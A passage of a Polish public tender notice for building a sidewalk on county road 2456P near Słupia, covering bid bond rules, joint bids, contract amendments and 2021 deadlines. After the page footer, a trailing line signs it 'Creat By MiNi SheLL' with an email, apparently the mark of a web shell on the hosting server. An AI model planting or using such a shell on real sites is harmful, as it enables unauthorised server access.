umocowanie nie wynika z dokumentów rejestrowych<br/>(Krajowy Rejestr Sądowy, Centralna Ewidencja i Informacja o Działalności Gospodarczej lub<br/>inny właściwy rejestr), Zamawiający żąda przedłożenia stosownego pełnomocnictwa lub innego<br/>dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy/podmiotu<br/>udostępniającego zasoby na zasadach określonych w art. 118 ustawy Pzp. Pełnomocnictwo do<br/>reprezentowania Wykonawcy w postępowaniu albo do reprezentowania w postępowaniu i<br/>zawarcia umowy należy złożyć także w przypadku Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia. Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w<br/>takiej samej formie, jak składana oferta (t. j. w formie elektronicznej lub postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym). Dopuszcza się także złożenie<br/>elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w<br/>formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14<br/>lutego 1991 roku – Prawo o notariacie (t. j.: Dz. U. z 2020 r., poz. 1192 ze zmianami), które to<br/>poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym, bądź też poprzez<br/>opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym<br/>podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia<br/>pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego.<br/>5. W przypadku składania oferty wspólnej, w formularzu oferty należy wymienić dane wszystkich<br/>Wykonawców występujących wspólnie.<br/>6. Do oferty należy dołączyć wszystkie wymagane w Ogłoszeniu i w SWZ dokumenty <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający żąda wniesienia wadium w kwocie: 8 000,00 PLN (słownie: osiem tysięcy i 00/100 PLN). <br/>2.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp. <br/>3.	Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą. <br/>4.	Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach: <br/>1)	pieniądzu,<br/>2)	gwarancjach bankowych,<br/>3)	gwarancjach ubezpieczeniowych,<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 roku poz. 310, 836 i 1572). <br/>5.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego: Bank Handlowy w Warszawie S.A. Oddział w Poznaniu nr 61 1030 1247 0000 0000 0782 2004. Kopię polecenia przelewu lub wydruk z przelewu elektronicznego zaleca się złożyć wraz z ofertą. <br/>6.	Wniesienie wadium w pieniądzu przelewem na rachunek bankowy wskazany przez Zamawiającego będzie skuteczne z chwilą uznania tego rachunku bankowego kwotą wadium, tzn. wpływ środków pieniężnych na rachunek bankowy wskazany przez Zamawiającego nastąpi przed upływem terminu składania ofert.<br/>7.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w ust. 4 pkt 2 - 4, Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>8.	W przypadku wadium wniesionego w pieniądzu oraz z treści gwarancji i poręczeń, o których mowa w ust. 4 pkt 2 - 4, jeżeli wadium będzie wniesione w tych formach, musi wynikać, że wadium zabezpiecza ofertę wykonawcy złożoną w postępowaniu o udzielenie zamówienia publicznego pn.: „Budowa chodnika w ciągu drogi powiatowej nr 2456P Tomiczki – granica powiatu w m. Słupia”, oznaczenie sprawy: WZ.261.2.23.2021.<br/>9.	Wadium wnoszone w formie poręczeń lub gwarancji, o których mowa w ust. 4 pkt 2 - 4, musi spełniać co najmniej poniższe wymagania:<br/>1)	musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie Pzp,<br/>2)	z jej treści powinno jednoznacznie wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>3)	powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4)	termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem, iż pierwszym dniem związania ofertą jest dzień składania ofert);<br/>5)	beneficjentem poręczenia lub gwarancji jest: Zarząd Dróg Powiatowych w Poznaniu;<br/>6)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 ustawy Pzp), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum).<br/>10.	Oferta Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp zostanie odrzucona.<br/>11.	Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia, o których mowa w Rozdziale VIII ust. 1 SWZ, składa każdy z Wykonawców.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane/dostawy/usługi wykonają poszczególni<br/>Wykonawcy.<br/>4) Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>5) W przypadku Wykonawców składających ofertę wspólną:<br/>a) warunek określony w ust. 8 pkt 4 ppkt a) musi spełniać co najmniej jeden z Wykonawców,<br/>który będzie miał obowiązek uczestnictwa w realizacji przedmiotu zamówienia w zakresie<br/>wykazywanego doświadczenia (doświadczenie nie podlega sumowaniu),<br/>b) warunek określony w ust. 8 pkt 4 ppkt b) Wykonawcy mogą spełniać łącznie,<br/>c) warunek określony w ust. 8 pkt 4 ppkt c) Wykonawcy mogą spełniać łącznie,<br/>d) w stosunku do żadnego z nich nie mogą istnieć podstawy do wykluczenia, określone w ust. 2 i 3.<br/>6) Wspólnicy spółki cywilnej traktowani są jak Wykonawcy składający ofertę wspólną <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiany w umowie mogą dotyczyć:<br/>1) zmiany terminów wykonania zam<br/>2) zmiany ilości rob. bud., opisane w § 1 ust 9 i 10, § 5 ust. 3 - 8 um.<br/>3) zmiany wynagrodzenia Wykonawcy, opisana w § 11 ust. 2-5 um.<br/>4) zmiana w zakresie podwykonawstwa, opisana w § 9 um.<br/>5) zmian rozwiązań tech lub technologicznych<br/>6) zmian sposobu wykon zam.<br/>7) zmiany producenta mat. Bud., urządzeń<br/>8) zmiany wymiarów, położenia lub wysokości części rob. bud.<br/>9) zmiany kier. budowy opisanych w §7 ust. 5 um.<br/>2. przedłużenie terminów realizacji umowy w przypadku:<br/>1) przestojów i opóźnień zawinionych przez Zam.<br/>2) działania siły wyższej mającej bezpośredni wpływ na terminowość wykonania robót<br/>3) wystąpienia niekorzystnych warunków atmosferycznych uniemożliwiających prawidłowe<br/>wykonanie robót<br/>4) wystąpienia konieczności wprowadzenia zmian w dokumentacji projekt., z przyczyn za które<br/>nie odpowiada Wykonawca, jeżeli uniemożliwia to lub wstrzymuje realizację określonego rodzaju<br/>robót mających wpływ na termin wykon. robót<br/>5) wystąpienia konieczności wykonania robót dodatk lub zamiennych, udzielenia zam. dodatk<br/>6) działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejś ze stron<br/>7) wystąpienia opóźnienia w dokonaniu określonych czynności lub ich zaniechania przez<br/>właściwe organy admin., które nie są następstwem okoliczności,za które Wykonawca ponosi<br/>odpowiedzialność<br/>8) wystąpienia opóźnienia w wydawaniu decyzji, zezwoleń,uzgodnień, itp.,do wydania których<br/>właściwe organy są zobowiązane na mocy przepisów prawa, jeżeli opóźnienie przekroczy okres,<br/>przewidziany w przepisach prawa, w którym ww. decyzje powinny zostać wydane oraz nie są<br/>następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność<br/>9) odmowy wydania przez właściwe organy decyzji, zezwoleń, uzgodnień itp. z przyczyn<br/>niezawinionych przez Wykonawcę<br/>10) niemożności wykonywania robót z powodu braku dostępności do miejsc niezbędnych do ich<br/>wykonania z przyczyn niezawinionych przez Wykonawcę<br/>11) niemożności wykonywania robót gdy uprawniony organ nie dopuszcza do wykonania robót<br/>lub nakazują wstrzymanie robót z przyczyn niezawinionych przez Wykonawcę<br/>3. W przedstawionych w ust. 3 powyżej przypadkach wystąpienia opóźnień lub wstrzymania<br/>realizacji, strony mogą ustalić nowe terminy umowy, z tym że maksymalny okres przesunięcia<br/>terminu zakoń. robót równy będzie okresowi przerwy,postoju lub okresowi niezbędnemu do<br/>wykonania robót nieprzewidzianych w przedm. robót.<br/>4. Zmiana terminów realizacji umowy możliwa jest tylko po wcześniejszym udokumentowaniu<br/>przedłużenia okresu zabezp. należytego wykon. umowy i okresu rękojmi.<br/>5. Zmiana sposobu wykonania przedmiotu umowy,zmiana wynagrodzenia Wykonawcy lub<br/>przedłużenie terminów realizacji umowy w przypadku:<br/>1) wystąpienia siły wyższej 2) zmian technologicznych<br/>3) konieczności zrealizowania jakiejkolwiek części robót,objętych przedmiotem umowy, przy<br/>zastosowaniu odmiennych rozwiązań techn. lub technologicznych,niż wskazane w dok. proj.i<br/>wynikających ze stwierdzonych wad tej dok. lub zmiany stanu prawnego w oparciu,o który je<br/>przygotowano,gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub<br/>wykonaniem nienależytym przedm. Um.<br/>4) odbiegających w sposób istotny od przyjętych w dok. projektowej warunków geologicznych,<br/>geotechnicznych lub hydrologicznych, rozpoznania terenu w zakresie znalezisk archeol.,<br/>występowania niewybuchów lub niewypałów, które mogą skutkować w świetle dotychczasowych<br/>założeń niewykonaniem lub nienależytym wykonaniem przedm. Um.<br/>5) odbiegających w sposób istotny od przyjętych w dokumentacji projektowej warunków terenu<br/>budowy<br/>6) konieczność zrealizowania przedm.zam. przy zastosowaniu innych rozw. Techn. lub materiał.<br/>ze wzgl. na zmiany obowiązującego prawa<br/>7) wystąpienia niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi przez<br/>inne podmioty inwestycjami<br/>8) zmiana kier. budowy<br/>Szczegółowo opisane w zał. Nr 6 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-09 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/zdp_poznan w przedmiotowym postępowaniu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-09 11:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-07</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-24 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com